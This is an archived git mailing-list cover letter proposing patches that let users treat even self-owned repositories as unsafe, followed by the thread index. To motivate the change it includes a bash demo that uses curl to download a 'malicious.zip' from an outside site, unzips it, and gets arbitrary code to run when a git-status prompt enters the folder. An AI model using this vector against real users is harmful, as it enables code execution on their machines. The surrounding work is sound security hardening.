From: Michael Lohmann <git@lohmann.sh>
To: git@vger.kernel.org
Cc: Michael Lohmann <git@lohmann.sh>, Jeff King <peff@peff.net>
Subject: [PATCH 0/5] Allow enforcing safe.directory
Date: Mon, 13 Oct 2025 11:41:41 +0200 [thread overview]
Message-ID: <20251013094152.23597-1-git@lohmann.sh> (raw)
Hey everyone!
As a first step to allow making git more resistant against accidental
arbitrary code execution, Jeff King suggested in
https://lore.kernel.org/git/20251009224317.77565-1-git@lohmann.sh/T/#m6cce96f9ae58a4341ae3fbbc02110e20547c58bc
to make the "safe.directory" config enforcable.
If a user has a command line status like:
```bash
# Let's assume the simplest command status prompt that shows "(+)" if
# there are uncommitted changes:
export PS1='$(if [ -n "$(git status --short 2>/dev/null)" ]; then; echo "(+)"; fi)> '
# You download a random zip folder from the internet, not knowing it is
# actually a repo:
curl --silent https://www.lohmann.sh/nuggits/002-dangerous-git/malicious.zip --output malicious.zip
# unzipping means the folder is owned by the user, so by default git
# assumes it is safe to execute hooks/config
unzip malicious.zip >/dev/null
echo 'Just a "README" no "xxx" file, see:'
ls malicious
# This `cd` now triggers arbitrary code execution due to `git status`:
cd malicious
# now there is an "xxx" file
```
With this feature, the prompt could either perform
`git --assume-unsafe status` or to make all git invocations by any
programs safe against accidental arbitrary code invocations a user could
set "safe.assumeUnsafe" to true.
Also allow to temporarily bypass this check with a new `--allow-unsafe`
flag.
--Michael
Michael Lohmann (5):
setup: rename `ensure_safe_repository()` for clarity
setup: rename `die_upon_assumed_unsafe_repo()` to align with check
setup: refactor `ensure_safe_repository()` testing priorities
setup: allow temporary bypass of `ensure_safe_repository()` checks
setup: allow not marking self owned repos as safe in
`ensure_safe_repository()`
Documentation/config/safe.adoc | 9 ++++
Documentation/git.adoc | 25 +++++++++++
builtin/clone.c | 2 +-
environment.h | 2 +
git.c | 9 ++++
path.c | 4 +-
setup.c | 45 ++++++++++++++------
setup.h | 2 +-
t/meson.build | 1 +
t/t0036-allow-unsafe-directory.sh | 70 +++++++++++++++++++++++++++++++
10 files changed, 153 insertions(+), 16 deletions(-)
create mode 100755 t/t0036-allow-unsafe-directory.sh
--
2.50.1 (Apple Git-155)
next reply other threads:[~2025-10-13 9:42 UTC|newest]
Thread overview: 24+ messages / expand[flat|nested] mbox.gz Atom feed top
2025-10-13 9:41 Michael Lohmann [this message]
2025-10-13 9:41 ` [PATCH 1/5] setup: rename `ensure_safe_repository()` for clarity Michael Lohmann
2025-10-13 9:41 ` [PATCH 2/5] setup: rename `die_upon_assumed_unsafe_repo()` to align with check Michael Lohmann
2025-10-14 20:16 ` Junio C Hamano
2025-10-13 9:41 ` [PATCH 3/5] setup: refactor `ensure_safe_repository()` testing priorities Michael Lohmann
2025-10-14 20:32 ` Junio C Hamano
2025-10-13 9:41 ` [PATCH 4/5] setup: allow temporary bypass of `ensure_safe_repository()` checks Michael Lohmann
2025-10-13 9:41 ` [PATCH 5/5] setup: allow not marking self owned repos as safe in `ensure_safe_repository()` Michael Lohmann
2025-10-13 11:59 ` D. Ben Knoble
2025-10-13 21:46 ` [PATCH v2 0/5] Apply comments of D. Ben Knoble Michael Lohmann
2025-10-13 21:46 ` [PATCH v2 1/5] setup: rename `ensure_safe_repository()` for clarity Michael Lohmann
2025-10-13 21:46 ` [PATCH v2 2/5] setup: rename `die_upon_assumed_unsafe_repo()` to align with check Michael Lohmann
2025-10-13 21:46 ` [PATCH v2 3/5] setup: refactor `ensure_safe_repository()` testing priorities Michael Lohmann
2025-10-13 21:46 ` [PATCH v2 4/5] setup: allow temporary bypass of `ensure_safe_repository()` checks Michael Lohmann
2025-10-13 21:46 ` [PATCH v2 5/5] setup: allow not marking self owned repos as safe in `ensure_safe_repository()` Michael Lohmann
2025-10-16 5:33 ` [PATCH v3 0/5] Allow skipping ownership of repo in safety consideration Michael Lohmann
2025-10-16 5:33 ` [PATCH v3 1/5] setup: rename `ensure_safe_repository()` for clarity Michael Lohmann
2025-10-16 5:33 ` [PATCH v3 2/5] setup: rename `die_upon_unsafe_repo()` to align with check Michael Lohmann
2025-10-16 5:33 ` [PATCH v3 3/5] setup: refactor `ensure_safe_repository()` testing priorities Michael Lohmann
2025-10-16 5:33 ` [PATCH v3 4/5] setup: allow temporary bypass of `ensure_safe_repository()` checks Michael Lohmann
2025-10-16 19:26 ` Junio C Hamano
2025-10-16 5:33 ` [PATCH v3 5/5] setup: allow not marking self owned repos as safe in `ensure_safe_repository()` Michael Lohmann
2025-10-16 19:33 ` Junio C Hamano
2025-10-16 19:58 ` Junio C Hamano
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20251013094152.23597-1-git@lohmann.sh \
--to=git@lohmann.sh \
--cc=git@vger.kernel.org \
--cc=peff@peff.net \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.